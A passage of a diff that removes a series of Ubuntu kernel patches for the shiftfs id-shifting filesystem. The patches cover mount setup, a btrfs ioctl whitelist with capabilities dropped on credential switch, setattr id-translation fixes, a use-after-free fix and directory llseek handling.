-+	.statfs		= shiftfs_statfs,
-+	.remount_fs	= shiftfs_remount,
-+	.evict_inode	= shiftfs_evict_inode,
-+};
-+
-+struct shiftfs_data {
-+	void *data;
-+	const char *path;
-+};
-+
-+static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
-+			      int silent)
-+{
-+	int err;
-+	struct path path = {};
-+	struct shiftfs_super_info *sbinfo_mp;
-+	char *name = NULL;
-+	struct inode *inode = NULL;
-+	struct dentry *dentry = NULL;
-+	struct shiftfs_data *data = raw_data;
-+	struct shiftfs_super_info *sbinfo = NULL;
-+
-+	if (!data->path)
-+		return -EINVAL;
-+
-+	sb->s_fs_info = kzalloc(sizeof(*sbinfo), GFP_KERNEL);
-+	if (!sb->s_fs_info)
-+		return -ENOMEM;
-+	sbinfo = sb->s_fs_info;
-+
-+	err = shiftfs_parse_mount_options(sbinfo, data->data);
-+	if (err)
-+		return err;
-+
-+	/* to mount a mark, must be userns admin */
-+	if (!sbinfo->mark && !ns_capable(current_user_ns(), CAP_SYS_ADMIN))
-+		return -EPERM;
-+
-+	name = kstrdup(data->path, GFP_KERNEL);
-+	if (!name)
-+		return -ENOMEM;
-+
-+	err = kern_path(name, LOOKUP_FOLLOW, &path);
-+	if (err)
-+		goto out_free_name;
- 
- 	if (!S_ISDIR(path.dentry->d_inode->i_mode)) {
- 		err = -ENOTDIR;
--		goto out_put;
-+		goto out_put_path;
- 	}
- 
--	sb->s_stack_depth = path.dentry->d_sb->s_stack_depth + 1;
--	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
--		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
--		err = -EINVAL;
--		goto out_put;
--	}
-+	if (sbinfo->mark) {
-+		struct super_block *lower_sb = path.mnt->mnt_sb;
-+
-+		/* to mark a mount point, must be root wrt lower s_user_ns */
-+		if (!ns_capable(lower_sb->s_user_ns, CAP_SYS_ADMIN)) {
-+			err = -EPERM;
-+			goto out_put_path;
-+		}
- 
--	if (ssi->mark) {
- 		/*
- 		 * this part is visible unshifted, so make sure there are
- 		 * no executables that could be used to gain suid
- 		 * privileges
- 		 */
- 		sb->s_iflags = SB_I_NOEXEC;
--		ssi->mnt = path.mnt;
--		dentry = path.dentry;
--	} else {
--		struct shiftfs_super_info *mp_ssi;
- 
- 		/*
--		 * this leg executes if we're admin capable in
--		 * the namespace, so be very careful
-+		 * Handle nesting of shiftfs mounts by referring this mark
-+		 * mount back to the original mark mount. This is more
-+		 * efficient and alleviates concerns about stack depth.
- 		 */
-+		if (lower_sb->s_magic == SHIFTFS_MAGIC) {
-+			sbinfo_mp = lower_sb->s_fs_info;
-+
-+			/* Doesn't make sense to mark a mark mount */
-+			if (sbinfo_mp->mark) {
-+				err = -EINVAL;
-+				goto out_put_path;
-+			}
-+
-+			if (!passthrough_is_subset(sbinfo_mp->passthrough,
-+						   sbinfo->passthrough)) {
-+				err = -EPERM;
-+				goto out_put_path;
-+			}
-+
-+			sbinfo->mnt = mntget(sbinfo_mp->mnt);
-+			dentry = dget(path.dentry->d_fsdata);
-+		} else {
-+			sbinfo->mnt = mntget(path.mnt);
-+			dentry = dget(path.dentry);
-+		}
-+
-+		sbinfo->creator_cred = prepare_creds();
-+		if (!sbinfo->creator_cred) {
-+			err = -ENOMEM;
-+			goto out_put_path;
-+		}
-+	} else {
-+		/*
-+		 * This leg executes if we're admin capable in the namespace,
-+		 * so be very careful.
-+		 */
-+		err = -EPERM;
- 		if (path.dentry->d_sb->s_magic != SHIFTFS_MAGIC)
--			goto out_put;
--		mp_ssi = path.dentry->d_sb->s_fs_info;
--		if (!mp_ssi->mark)
--			goto out_put;
--		ssi->mnt = mntget(mp_ssi->mnt);
-+			goto out_put_path;
-+
-+		sbinfo_mp = path.dentry->d_sb->s_fs_info;
-+		if (!sbinfo_mp->mark)
-+			goto out_put_path;
-+
-+		if (!passthrough_is_subset(sbinfo_mp->passthrough,
-+					   sbinfo->passthrough))
-+			goto out_put_path;
-+
-+		sbinfo->mnt = mntget(sbinfo_mp->mnt);
-+		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
- 		dentry = dget(path.dentry->d_fsdata);
--		path_put(&path);
-+		sbinfo->info_mark = sbinfo_mp;
-+	}
-+
-+	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
-+	if (sb->s_stack_depth > FILESYSTEM_MAX_STACK_DEPTH) {
-+		printk(KERN_ERR "shiftfs: maximum stacking depth exceeded\n");
-+		err = -EINVAL;
-+		goto out_put_path;
-+	}
-+
-+	inode = new_inode(sb);
-+	if (!inode) {
-+		err = -ENOMEM;
-+		goto out_put_path;
- 	}
--	ssi->userns = get_user_ns(dentry->d_sb->s_user_ns);
--	sb->s_fs_info = ssi;
-+	shiftfs_fill_inode(inode, dentry->d_inode->i_ino, S_IFDIR, 0, dentry);
-+
-+	ihold(dentry->d_inode);
-+	inode->i_private = dentry->d_inode;
-+
- 	sb->s_magic = SHIFTFS_MAGIC;
- 	sb->s_op = &shiftfs_super_ops;
- 	sb->s_xattr = shiftfs_xattr_handlers;
- 	sb->s_d_op = &shiftfs_dentry_ops;
--	sb->s_root = d_make_root(shiftfs_new_inode(sb, S_IFDIR, dentry));
-+	sb->s_flags |= SB_POSIXACL;
-+	sb->s_root = d_make_root(inode);
-+	if (!sb->s_root) {
-+		err = -ENOMEM;
-+		goto out_put_path;
-+	}
-+
- 	sb->s_root->d_fsdata = dentry;
-+	sbinfo->userns = get_user_ns(dentry->d_sb->s_user_ns);
-+	shiftfs_copyattr(dentry->d_inode, sb->s_root->d_inode);
- 
--	return 0;
-+	dentry = NULL;
-+	err = 0;
- 
-- out_put:
-+out_put_path:
- 	path_put(&path);
-- out:
-+
-+out_free_name:
- 	kfree(name);
--	kfree(ssi);
-+
-+	dput(dentry);
-+
- 	return err;
- }
- 
-@@ -764,17 +1869,26 @@ static struct file_system_type shiftfs_type = {
- 
- static int __init shiftfs_init(void)
- {
-+	shiftfs_file_info_cache = kmem_cache_create(
-+		"shiftfs_file_info_cache", sizeof(struct shiftfs_file_info), 0,
-+		SLAB_HWCACHE_ALIGN | SLAB_ACCOUNT | SLAB_MEM_SPREAD, NULL);
-+	if (!shiftfs_file_info_cache)
-+		return -ENOMEM;
-+
- 	return register_filesystem(&shiftfs_type);
- }
- 
- static void __exit shiftfs_exit(void)
- {
- 	unregister_filesystem(&shiftfs_type);
-+	kmem_cache_destroy(shiftfs_file_info_cache);
- }
- 
- MODULE_ALIAS_FS("shiftfs");
- MODULE_AUTHOR("James Bottomley");
--MODULE_DESCRIPTION("uid/gid shifting bind filesystem");
-+MODULE_AUTHOR("Seth Forshee <seth.forshee@canonical.com>");
-+MODULE_AUTHOR("Christian Brauner <christian.brauner@ubuntu.com>");
-+MODULE_DESCRIPTION("id shifting filesystem");
- MODULE_LICENSE("GPL v2");
- module_init(shiftfs_init)
- module_exit(shiftfs_exit)
--- 
-2.39.2
-
-From a2e0843dcd21746dfc23df95ab8c93af942fac6b Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Thu, 4 Apr 2019 15:39:13 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support some btrfs ioctls
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1823186
-
-Shiftfs currently only passes through a few ioctl()s to the underlay. These
-are ioctl()s that are generally considered safe. Doing it for random
-ioctl()s would be a security issue. Permissions for ioctl()s are not
-checked before the filesystem gets involved so if we were to override
-credentials we e.g. could do a btrfs tree search in the underlay which we
-normally wouldn't be allowed to do.
-However, the btrfs filesystem allows unprivileged users to perform various
-operations through its ioctl() interface. With shiftfs these ioctl() are
-currently not working. To not regress users that expect btrfs ioctl()s to
-work in unprivileged containers we can create a whitelist of ioctl()s that
-we allow to go through to the underlay and for which we also switch
-credentials.
-The main problem is how we switch credentials. Since permission checks for
-ioctl()s are done by the actual filesystem and not by the vfs, any
-additional capable(<cap>)-based checks done by the filesystem would
-unconditionally pass after we switch credentials. So to make credential
-switching safe we drop *all* capabilities when switching credentials. This
-means that only inode-based permission checks will pass.
-
-Btrfs also allows unprivileged users to delete snapshots when the
-filesystem is mounted with the user_subvol_rm_allowed mount option or if
-the caller is capable(CAP_SYS_ADMIN). The latter should never be the case
-with unprivileged users. To make sure we only allow removal of snapshots in
-the former case we drop all capabilities (see above) when switching
-credentials.
-
-Additionally, btrfs allows the creation of snapshots. To make this work we
-need to be (too) clever. When doing snapshots btrfs requires that an fd to
-the directory the snapshot is supposed to be created in be passed along.
-This fd obviously references a shiftfs file and as such a shiftfs dentry
-and inode. This will cause btrfs to yell EXDEV. To circumvent this
-problem we need to silently temporarily replace the passed in fd with an fd
-that refers to a file that references a btrfs dentry and inode.
-
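-For illustration, this is roughly how userspace hands btrfs the extra fd
-that shiftfs then has to swap out (a minimal sketch; the paths are made
-up):
-
- #include <fcntl.h>
- #include <string.h>
- #include <sys/ioctl.h>
- #include <linux/btrfs.h>
-
- int make_snapshot(void)
- {
-  /* Both fds reference shiftfs files, not btrfs files. */
-  int dst = open("/mnt/shiftfs/snaps", O_RDONLY);
-  int src = open("/mnt/shiftfs/subvol", O_RDONLY);
-  struct btrfs_ioctl_vol_args args = { .fd = src };
-
-  strcpy(args.name, "snap0");
-  /* args.fd is the fd btrfs inspects; without the fd replacement
-   * described above it refers to a shiftfs file and btrfs fails
-   * the ioctl() with EXDEV. */
-  return ioctl(dst, BTRFS_IOC_SNAP_CREATE, &args);
- }
-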
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 156 +++++++++++++++++++++++++++++++++++++++++++++++++--
- 1 file changed, 151 insertions(+), 5 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index ad1ae5bce6c1..678cad30f4a5 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1,6 +1,8 @@
-+#include <linux/btrfs.h>
- #include <linux/capability.h>
- #include <linux/cred.h>
- #include <linux/mount.h>
-+#include <linux/fdtable.h>
- #include <linux/file.h>
- #include <linux/fs.h>
- #include <linux/namei.h>
-@@ -41,7 +43,21 @@ static void shiftfs_fill_inode(struct inode *inode, unsigned long ino,
- 
- #define SHIFTFS_PASSTHROUGH_NONE 0
- #define SHIFTFS_PASSTHROUGH_STAT 1
--#define SHIFTFS_PASSTHROUGH_ALL (SHIFTFS_PASSTHROUGH_STAT)
-+#define SHIFTFS_PASSTHROUGH_IOCTL 2
-+#define SHIFTFS_PASSTHROUGH_ALL                                                \
-+	(SHIFTFS_PASSTHROUGH_STAT | SHIFTFS_PASSTHROUGH_IOCTL)
-+
-+static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
-+{
-+	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
-+		return false;
-+
-+	if (info->info_mark &&
-+	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
-+		return false;
-+
-+	return true;
-+}
- 
- static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
- {
-@@ -1345,18 +1361,120 @@ static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
- 	return shiftfs_revert_object_creds(oldcred, newcred);
- }
- 
-+static inline bool is_btrfs_snap_ioctl(int cmd)
-+{
-+	if ((cmd == BTRFS_IOC_SNAP_CREATE) || (cmd == BTRFS_IOC_SNAP_CREATE_V2))
-+		return true;
-+
-+	return false;
-+}
-+
-+static int shiftfs_btrfs_ioctl_fd_restore(int cmd, struct fd lfd, int fd,
-+					  void __user *arg,
-+					  struct btrfs_ioctl_vol_args *v1,
-+					  struct btrfs_ioctl_vol_args_v2 *v2)
-+{
-+	int ret;
-+
-+	if (!is_btrfs_snap_ioctl(cmd))
-+		return 0;
-+
-+	if (cmd == BTRFS_IOC_SNAP_CREATE)
-+		ret = copy_to_user(arg, v1, sizeof(*v1));
-+	else
-+		ret = copy_to_user(arg, v2, sizeof(*v2));
-+
-+	fdput(lfd);
-+	__close_fd(current->files, fd);
-+	kfree(v1);
-+	kfree(v2);
-+
-+	return ret;
-+}
-+
-+static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
-+					  struct btrfs_ioctl_vol_args **b1,
-+					  struct btrfs_ioctl_vol_args_v2 **b2,
-+					  struct fd *lfd,
-+					  int *newfd)
-+{
-+	int oldfd, ret;
-+	struct fd src;
-+	struct btrfs_ioctl_vol_args *v1 = NULL;
-+	struct btrfs_ioctl_vol_args_v2 *v2 = NULL;
-+
-+	if (!is_btrfs_snap_ioctl(cmd))
-+		return 0;
-+
-+	if (cmd == BTRFS_IOC_SNAP_CREATE) {
-+		v1 = memdup_user(arg, sizeof(*v1));
-+		if (IS_ERR(v1))
-+			return PTR_ERR(v1);
-+		oldfd = v1->fd;
-+		*b1 = v1;
-+	} else {
-+		v2 = memdup_user(arg, sizeof(*v2));
-+		if (IS_ERR(v2))
-+			return PTR_ERR(v2);
-+		oldfd = v2->fd;
-+		*b2 = v2;
-+	}
-+
-+	src = fdget(oldfd);
-+	if (!src.file)
-+		return -EINVAL;
-+
-+	ret = shiftfs_real_fdget(src.file, lfd);
-+	fdput(src);
-+	if (ret)
-+		return ret;
-+
-+	*newfd = get_unused_fd_flags(lfd->file->f_flags);
-+	if (*newfd < 0) {
-+		fdput(*lfd);
-+		return *newfd;
-+	}
-+
-+	fd_install(*newfd, lfd->file);
-+
-+	if (cmd == BTRFS_IOC_SNAP_CREATE) {
-+		v1->fd = *newfd;
-+		ret = copy_to_user(arg, v1, sizeof(*v1));
-+		v1->fd = oldfd;
-+	} else {
-+		v2->fd = *newfd;
-+		ret = copy_to_user(arg, v2, sizeof(*v2));
-+		v2->fd = oldfd;
-+	}
-+
-+	if (ret)
-+		shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
-+
-+	return ret;
-+}
-+
- static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- 			       unsigned long arg)
- {
--	long ret = 0;
- 	struct fd lowerfd;
- 	struct cred *newcred;
- 	const struct cred *oldcred;
-+	int newfd = -EBADF;
-+	long err = 0, ret = 0;
-+	void __user *argp = (void __user *)arg;
-+	struct fd btrfs_lfd = {};
- 	struct super_block *sb = file->f_path.dentry->d_sb;
-+	struct btrfs_ioctl_vol_args *btrfs_v1 = NULL;
-+	struct btrfs_ioctl_vol_args_v2 *btrfs_v2 = NULL;
-+
-+	ret = shiftfs_btrfs_ioctl_fd_replace(cmd, argp, &btrfs_v1, &btrfs_v2,
-+					     &btrfs_lfd, &newfd);
-+	if (ret < 0)
-+		return ret;
- 
- 	ret = shiftfs_real_fdget(file, &lowerfd);
- 	if (ret)
--		return ret;
-+		goto out_restore;
- 
- 	ret = shiftfs_override_ioctl_creds(sb, &oldcred, &newcred);
- 	if (ret)
-@@ -1372,9 +1490,33 @@ static long shiftfs_real_ioctl(struct file *file, unsigned int cmd,
- out_fdput:
- 	fdput(lowerfd);
- 
-+out_restore:
-+	err = shiftfs_btrfs_ioctl_fd_restore(cmd, btrfs_lfd, newfd, argp,
-+					     btrfs_v1, btrfs_v2);
-+	if (!ret)
-+		ret = err;
-+
- 	return ret;
- }
- 
-+static bool in_ioctl_whitelist(int flag)
-+{
-+	switch (flag) {
-+	case BTRFS_IOC_SNAP_CREATE:
-+		return true;
-+	case BTRFS_IOC_SNAP_CREATE_V2:
-+		return true;
-+	case BTRFS_IOC_SUBVOL_CREATE:
-+		return true;
-+	case BTRFS_IOC_SUBVOL_CREATE_V2:
-+		return true;
-+	case BTRFS_IOC_SNAP_DESTROY:
-+		return true;
-+	}
-+
-+	return false;
-+}
-+
- static long shiftfs_ioctl(struct file *file, unsigned int cmd,
- 			  unsigned long arg)
- {
-@@ -1386,7 +1528,9 @@ static long shiftfs_ioctl(struct file *file, unsigned int cmd,
- 	case FS_IOC_SETFLAGS:
- 		break;
- 	default:
--		return -ENOTTY;
-+		if (!in_ioctl_whitelist(cmd) ||
-+		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
-+			return -ENOTTY;
- 	}
- 
- 	return shiftfs_real_ioctl(file, cmd, arg);
-@@ -1403,7 +1547,9 @@ static long shiftfs_compat_ioctl(struct file *file, unsigned int cmd,
- 	case FS_IOC32_SETFLAGS:
- 		break;
- 	default:
--		return -ENOIOCTLCMD;
-+		if (!in_ioctl_whitelist(cmd) ||
-+		    !shiftfs_passthrough_ioctls(file->f_path.dentry->d_sb->s_fs_info))
-+			return -ENOIOCTLCMD;
- 	}
- 
- 	return shiftfs_real_ioctl(file, cmd, arg);
--- 
-2.39.2
-
-From 7e64c9484f2524943cde1164852c1888312c010f Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Thu, 11 Apr 2019 07:31:04 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use translated ids when changing lower
- fs attrs
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1824350
-
-shiftfs_setattr() is preparing a new set of attributes with the
-owner translated for the lower fs, but it then passes the
-original attrs. As a result the owner is set to the untranslated
-owner, which causes the shiftfs inodes to also have incorrect
-ids. For example:
-
- # mkdir dir
- # touch file
- # ls -lh dir file
- drwxr-xr-x 2 root root 4.0K Apr 11 13:05 dir
- -rw-r--r-- 1 root root 0 Apr 11 13:05 file
- # chown 500:500 dir file
- # ls -lh dir file
- drwxr-xr-x 2 1000500 1000500 4.0K Apr 11 12:42 dir
- -rw-r--r-- 1 1000500 1000500 0 Apr 11 12:42 file
-
-Fix this to pass the correct iattr struct to notify_change().
-
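-Condensed from the diff below, the intended pattern is:
-
- struct iattr newattr = *attr;
-
- /* Translate the ids into the lower filesystem's view ... */
- newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
- newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
-
- /* ... and pass the translated copy, not the original attrs. */
- err = notify_change(lowerd, &newattr, NULL);
-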
-Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 678cad30f4a5..e736fd6afcb4 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -779,7 +779,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 
- 	inode_lock(loweri);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = notify_change(lowerd, attr, NULL);
-+	err = notify_change(lowerd, &newattr, NULL);
- 	revert_creds(oldcred);
- 	inode_unlock(loweri);
- 
--- 
-2.39.2
-
-From 84e09374dce45b2aaec7e719acd209b1e5e4ae85 Mon Sep 17 00:00:00 2001
-From: Seth Forshee <seth.forshee@canonical.com>
-Date: Sat, 13 Apr 2019 14:41:01 -0500
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix passing of attrs to underlay for
- setattr
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1824717
-
-shiftfs_setattr() makes a copy of the attrs it was passed to pass
-to the lower fs. It then calls setattr_prepare() with the original
-attrs, and this may make changes which are not reflected in the
-attrs passed to the lower fs. To fix this, copy the attrs to the
-new struct for the lower fs after calling setattr_prepare().
-
-Additionally, notify_change() may have set ATTR_MODE when one of
-ATTR_KILL_S[UG]ID is set, and passing this combination to
-notify_change() will trigger a BUG(). Do as overlayfs and
-ecryptfs both do, and clear ATTR_MODE if either of those bits
-is set.
-
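-Condensed from the diff below, the resulting order of operations is:
-
- err = setattr_prepare(dentry, attr);
- if (err)
-  return err;
-
- /* Copy only after setattr_prepare() may have adjusted attr. */
- newattr = *attr;
-
- /* The mode change only clears setuid/setgid bits here; let the lower
-  * fs interpret that itself, as overlayfs and ecryptfs do. */
- if (newattr.ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
-  newattr.ia_valid &= ~ATTR_MODE;
-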
-Reviewed-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Marcelo Henrique Cerri <marcelo.cerri@canonical.com>
-Acked-by: Brad Figg <brad.figg@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index e736fd6afcb4..8e064756ea0c 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -765,7 +765,7 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- {
- 	struct dentry *lowerd = dentry->d_fsdata;
- 	struct inode *loweri = lowerd->d_inode;
--	struct iattr newattr = *attr;
-+	struct iattr newattr;
- 	const struct cred *oldcred;
- 	struct super_block *sb = dentry->d_sb;
- 	int err;
-@@ -774,9 +774,17 @@ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
- 	if (err)
- 		return err;
- 
-+	newattr = *attr;
- 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
- 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
- 
-+	/*
-+	 * mode change is for clearing setuid/setgid bits. Allow lower fs
-+	 * to interpret this in its own way.
-+	 */
-+	if (newattr.ia_valid & (ATTR_KILL_SUID|ATTR_KILL_SGID))
-+		newattr.ia_valid &= ~ATTR_MODE;
-+
- 	inode_lock(loweri);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
- 	err = notify_change(lowerd, &newattr, NULL);
--- 
-2.39.2
-
-From a3ba10b3019139566fa65c351966ca3482c90819 Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Mon, 15 Apr 2019 15:21:55 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: prevent use-after-free when verifying
- mount options
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1824735
-
-Copy up the passthrough mount settings of the mark mount point to the
-shiftfs overlay.
-
-Before this commit we used to keep a reference to the shiftfs mark
-mount's shiftfs_super_info which was stashed in the superblock of the
-mark mount. The problem is that we only take a reference to the mount of
-the underlay, i.e. the filesystem that is *under* the shiftfs mark
-mount. This means when someone performs a shiftfs mark mount, then a
-shiftfs overlay mount and then immediately unmounts the shiftfs mark
-mount, we muck with invalid memory since shiftfs_put_super might have
-already been called, freeing that memory.
-
-Another solution would be to start reference counting. But this would be
-overkill. We only care about the passthrough mount option of the mark
-mount. And we only need it to verify that on remount the new passthrough
-options of the shiftfs overlay are a subset of the mark mount's
-passthrough options. In other scenarios we don't care. So copying up is
-good enough and also only needs to happen once on mount, i.e. when a new
-superblock is created and the .fill_super method is called.
-
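-Condensed from the diff below, the remount check then relies only on the
-copied-up value and never dereferences the mark mount's sb_info:
-
- /* Don't allow exceeding passthrough options of mark mount. */
- if (!passthrough_is_subset(info->passthrough_mark, info->passthrough))
-  return -EPERM;
-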
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Seth Forshee <seth.forshee@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 29 ++++++++++++++++++-----------
- 1 file changed, 18 insertions(+), 11 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 8e064756ea0c..4c8a6ec2a617 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -28,7 +28,7 @@ struct shiftfs_super_info {
- 	const struct cred *creator_cred;
- 	bool mark;
- 	unsigned int passthrough;
--	struct shiftfs_super_info *info_mark;
-+	unsigned int passthrough_mark;
- };
- 
- struct shiftfs_file_info {
-@@ -52,10 +52,6 @@ static inline bool shiftfs_passthrough_ioctls(struct shiftfs_super_info *info)
- 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
- 		return false;
- 
--	if (info->info_mark &&
--	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_IOCTL))
--		return false;
--
- 	return true;
- }
- 
-@@ -64,10 +60,6 @@ static inline bool shiftfs_passthrough_statfs(struct shiftfs_super_info *info)
- 	if (!(info->passthrough & SHIFTFS_PASSTHROUGH_STAT))
- 		return false;
- 
--	if (info->info_mark &&
--	    !(info->info_mark->passthrough & SHIFTFS_PASSTHROUGH_STAT))
--		return false;
--
- 	return true;
- }
- 
-@@ -1824,7 +1816,7 @@ static int shiftfs_remount(struct super_block *sb, int *flags, char *data)
- 
- 	if (info->passthrough != new.passthrough) {
- 		/* Don't allow exceeding passthrough options of mark mount. */
--		if (!passthrough_is_subset(info->info_mark->passthrough,
-+		if (!passthrough_is_subset(info->passthrough_mark,
- 					   info->passthrough))
- 			return -EPERM;
- 
-@@ -1926,9 +1918,19 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 
- 			sbinfo->mnt = mntget(sbinfo_mp->mnt);
- 			dentry = dget(path.dentry->d_fsdata);
-+			/*
-+			 * Copy up the passthrough mount options from the
-+			 * parent mark mountpoint.
-+			 */
-+			sbinfo->passthrough_mark = sbinfo_mp->passthrough_mark;
- 		} else {
- 			sbinfo->mnt = mntget(path.mnt);
- 			dentry = dget(path.dentry);
-+			/*
-+			 * For a new mark passthrough_mark and passthrough
-+			 * are identical.
-+			 */
-+			sbinfo->passthrough_mark = sbinfo->passthrough;
- 		}
- 
- 		sbinfo->creator_cred = prepare_creds();
-@@ -1956,7 +1958,12 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		sbinfo->mnt = mntget(sbinfo_mp->mnt);
- 		sbinfo->creator_cred = get_cred(sbinfo_mp->creator_cred);
- 		dentry = dget(path.dentry->d_fsdata);
--		sbinfo->info_mark = sbinfo_mp;
-+		/*
-+		 * Copy up passthrough settings from mark mountpoint so we can
-+		 * verify when the overlay wants to remount with different
-+		 * passthrough settings.
-+		 */
-+		sbinfo->passthrough_mark = sbinfo_mp->passthrough;
- 	}
- 
- 	sb->s_stack_depth = dentry->d_sb->s_stack_depth + 1;
--- 
-2.39.2
-
-From a6ec1bf679d71f552f3eee7bf2b5458a6ea71e9a Mon Sep 17 00:00:00 2001
-From: Christian Brauner <christian@brauner.io>
-Date: Tue, 16 Apr 2019 18:29:00 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: use separate llseek method for
- directories
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1824812
-
-Give shiftfs its own proper llseek method for directories.
-
-Before this commit we used to rely on an llseek method that was
-targeted for regular files for both directories and regular files.
-However, the realfile's f_pos was not correctly handled when userspace
-called lseek(2) on a shiftfs directory file. Give directories their
-own llseek operation so that seeking on a directory file is properly
-supported.
-
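-Condensed from the diff below, the directory variant simply seeks the
-underlying real file so that its f_pos stays in sync:
-
- struct shiftfs_file_info *file_info = file->private_data;
-
- return vfs_llseek(file_info->realfile, offset, whence);
-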
-Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
-Acked-by: Seth Forshee <seth.forshee@canonical.com>
-Acked-by: Tyler Hicks <tyhicks@canonical.com>
-Acked-by: Stefan Bader <stefan.bader@canonical.com>
-Signed-off-by: Kleber Sacilotto de Souza <kleber.souza@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 14 +++++++++++---
- 1 file changed, 11 insertions(+), 3 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index 4c8a6ec2a617..9771165d1ce0 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -1144,7 +1144,15 @@ static int shiftfs_release(struct inode *inode, struct file *file)
- 	return 0;
- }
- 
--static loff_t shiftfs_llseek(struct file *file, loff_t offset, int whence)
-+static loff_t shiftfs_dir_llseek(struct file *file, loff_t offset, int whence)
-+{
-+	struct shiftfs_file_info *file_info = file->private_data;
-+	struct file *realfile = file_info->realfile;
-+
-+	return vfs_llseek(realfile, offset, whence);
-+}
-+
-+static loff_t shiftfs_file_llseek(struct file *file, loff_t offset, int whence)
- {
- 	struct inode *realinode = file_inode(file)->i_private;
- 
-@@ -1653,7 +1661,7 @@ static int shiftfs_iterate_shared(struct file *file, struct dir_context *ctx)
- const struct file_operations shiftfs_file_operations = {
- 	.open			= shiftfs_open,
- 	.release		= shiftfs_release,
--	.llseek			= shiftfs_llseek,
-+	.llseek			= shiftfs_file_llseek,
- 	.read_iter		= shiftfs_read_iter,
- 	.write_iter		= shiftfs_write_iter,
- 	.fsync			= shiftfs_fsync,
-@@ -1670,7 +1678,7 @@ const struct file_operations shiftfs_dir_operations = {
- 	.compat_ioctl		= shiftfs_compat_ioctl,
- 	.fsync			= shiftfs_fsync,
- 	.iterate_shared		= shiftfs_iterate_shared,
--	.llseek			= shiftfs_llseek,
-+	.llseek			= shiftfs_dir_llseek,
- 	.open			= shiftfs_open,
- 	.read			= generic_read_dir,
- 	.release		= shiftfs_release,
--- 
